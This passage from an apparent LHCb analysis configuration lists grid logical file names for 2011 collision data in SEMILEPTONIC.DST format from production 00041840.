'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006465_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048636_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032689_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067885_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023054_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006539_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005594_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061690_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054902_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004579_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040399_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021471_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020561_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000256_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046160_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056496_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049607_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007741_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027130_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064842_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033495_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037774_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058699_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034736_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020352_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062488_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060935_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029610_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039510_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041674_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027624_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044312_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068120_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049319_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060462_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034752_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043645_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001223_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009476_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061830_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008602_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040854_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027463_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020435_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049295_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027331_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039366_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037859_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058369_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004075_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050278_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048307_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037263_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033802_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022700_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002026_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025515_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041898_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058893_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002327_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002542_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065225_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013493_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018130_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005215_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002497_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066161_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010271_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021824_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014919_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014807_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061871_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065782_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015329_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028847_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057320_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042088_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043354_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016559_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047720_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051536_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019938_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036424_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028965_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041675_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014301_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052435_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061901_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041997_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000126_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015844_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026291_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018489_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005485_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057081_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042269_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053422_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054918_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015665_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067853_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017679_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012174_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016421_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028264_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017282_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002838_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052863_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046656_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051828_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063806_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045460_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059005_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024364_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049047_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059477_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043484_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067038_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042427_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003538_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033148_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053913_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014069_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035749_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000098_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040283_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000371_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014550_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001010_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067567_1.semileptonic.dst',
